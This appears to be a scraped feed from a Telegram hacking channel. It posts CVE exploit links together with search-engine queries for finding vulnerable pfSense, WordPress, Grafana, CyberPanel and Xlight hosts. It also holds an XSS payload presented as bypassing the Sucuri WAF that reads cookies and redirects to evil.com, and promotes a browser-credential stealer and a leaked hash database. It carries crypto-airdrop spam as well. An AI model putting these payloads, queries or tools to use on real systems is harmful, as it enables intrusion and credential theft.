HackTheBox Academy
Closed channel
🔴Learn About #Linux 🔴Learn About #Windows 🔴Learn About #CVE 🔴Learn About #EXPLOIT 🔴Learn About #Vulnerability ✅ADMIN : @NullByte0x1
Show more3 327
Subscribers
No data24 hours
-207 days
-9330 days
Posts Archive
3 327
🌎 remotely control any PC with USB.
#Course #Ethical_Hacker #PenTest
#Fliper_Zero #Red_Team #Bad_USB
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security
3 327
🐾 Airdrop Paws received Telegram's blue tick in 2 days.
Mr. Smerkis, the founder of the Blum project, also posted a link to Paws and announced his official support.
No need to play 🚫
Get tokens based on your account age
JOIN TO THE GAME 💥
🐾ایردراپ پاوز در ۲ روز تیک آبی تلگرام رو دریافت کرد.
آقای اسمرکیس بنیانگذار پروژه بلوم هم لینک Paws گذاشته و حمایت رسمی خودشو اعلام کرده.
نیازی به بازی کردن نیست 🚫
بر اساس سن اکانتتون، توکن دریافت کنید
لینک ورود به بازی 💥
3 327
🎩 HackBrowserData
🔲 This tool hijacks all your browser data by default, dumping information from every browser on the system, including passwords, cookies, bookmarks, history, downloads, and more.
🖥 GitHub
#Red_Team #Pentest #Hacking
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security
3 327
↔️ CVE-2024-46538
❗️ A cross-site scripting (XSS) vulnerability in pfsense v2.5.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the $pconfig variable at interfaces_groups_edit.php.
🖥 EXPLOIT - POC
🔎Zoomeye:
app:"pfSense Firewall httpd"#CVE #Exploit #Vulnerability #Ethical_Hacker #Pentest #POC ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security
3 327
↔️ CVE-2024-9593
❗️ The Time Clock plugin and Time Clock Pro plugin for WordPress are vulnerable to Remote Code Execution in versions up to, and including, 1.2.2 (for Time Clock) and 1.1.4 (for Time Clock Pro)
🖥 EXPLOIT - POC
🔎fofa.info:
body="/wp-content/plugins/time-clock/" || body="/wp-content/plugins/time-clock-pro/"
#CVE #Exploit #Vulnerability
#Ethical_Hacker #Pentest #POC
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security3 327
↔️ CVE-2024-46483
❗️ Xlight FTP Server <3.9.4.3 has an integer overflow vulnerability in the packet parsing logic of the SFTP server, which can lead to a heap overflow with attacker-controlled content.
🖥 EXPLOIT - POC
🔎hunter.how:
product.name="Xlight ftpd"
🔎fofa.info:
app="Xlight-FTP"
#CVE #Exploit #Vulnerability
#Ethical_Hacker #Pentest #POC
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security3 327
↔️ CyberPanel v2.3.6 root RCE drop
❗️ This lead to a 0-click pre-auth root RCE on the latest version (2.3.6 as of now).
🖥 EXPLOIT - POC
🔎hunter.how:
product.name="CyberPanel"
🔎fofa.info:
app="CyberPanel"
#CVE #Exploit #Vulnerability
#Ethical_Hacker #Pentest #POC
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security3 327
با وجود اینکه جمهوری تروریست اسلامی قلمرو صلح و دوستی شما را به زور اسلحه و ترور به تصرف خود درآورده و در جهت نابودی تمدن و میراث شما تلاش کرده است، اما عشق شما همچنان در دل ملت ایران می جوشد.
۷ آبان روز مرد بزرگ جهان #کوروش_کبیر بر تمامی ایرانیان و مردم صلج طلب دنیا مبارک باد
👑👑👑👑👑👑👑👑👑👑👑
Even though the terrorist Islamic Republic has seized your territory of peace and friendship by force of arms and terror and has tried to destroy your civilization and heritage, your love still boils in the hearts of the Iranian nation.
Happy the day of the great man of the world, #Cyrus_the_Great, to all Iranians and peace-loving people of the world
3 327
🩸🩸🩸🩸🩸🩸 🩸🩸🅰️🩸
🛡 Sploitscan finds security vulnerabilities in OS and applications.
📌 Features:
- CVE Information Retrieval
- Public Exploits Aggregation
- HackerOne Reports
- Multi-CVE Support and Export Options
- Vulnerability Scanner Import
- User-Friendly Interface
- Comprehensive Security Tool
👩💻 Install:
sudo apt install sploitscan
🖥 Github:
https://github.com/xaitax/SploitScan
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security3 327
📌 The Red Team Guid
#BOOK
#Pentest #Ethical_Hacker
#Hacking #Red_Team
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security
3 327
Embed a payload within a PNG file by splitting the payload across multiple IDAT sections. Each section is encrypted individually using its own 16-byte key with the RC4 encryption algorithm.
🖥 GITHUB
3 327
Call it the biggest #NTLM #password database or monstrous #MD5 leak, but on weakpass.com, you can find precomputed datasets for various wordlists and different hashes - all free!
FYI: all_in_one.latin.txt for NTLM contains 26.5 billion pairs of hash:password inside!
🛡 WEAKPASS
3 327
↔️ CVE-2024-9264
❗️ The SQL Expressions experimental feature of Grafana allows for the evaluation of
duckdb queries containing user input.
🖥 POC - EXPLOIT
🔎ZoomEye:
app:"Grafana"
#CVE #EXPLOIT #Vulnerability
#Pentest #Ethical_Hacker #Windows
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security3 327
Repost from GitHub BOX
New #PENTESTING repository:
Title: Webshell upload techniques & Web RCE techniques
Link: https://github.com/Jean-Francois-C/Webshell-Upload-and-Web-RCE-Techniques
3 327
🌎 Prototype Pollution for Beginners.
#Course #Ethical_Hacker #PenTest
#Web #Red_Team #BugBounty
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security
3 327
#XSS Payload To Bypass Sucuri WAF :
payload:
<a aa aaa aaaa aaaaaa href=javascript:alert(document.cookie)>ClickMe
<a href="javascript:alert('Sucuri WAF Bypassed ! ' + document.domain + '\nCookie: ' + document.cookie); window.location.href='https://evil.com';">ClickMe</a>#XSS #Ethical_Hacker #PenTest #Waf #Red_Team #Bypass ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security
3 327
Repost from Cyber Lab (KurtLar)
هک دوربین های مداربسته قسمت دوم
مدرس ایپی ها کوروش سنایی و مدرس تست نفوذ دوربین های مداربسته @Bvrce
t.me/KurtLar0101
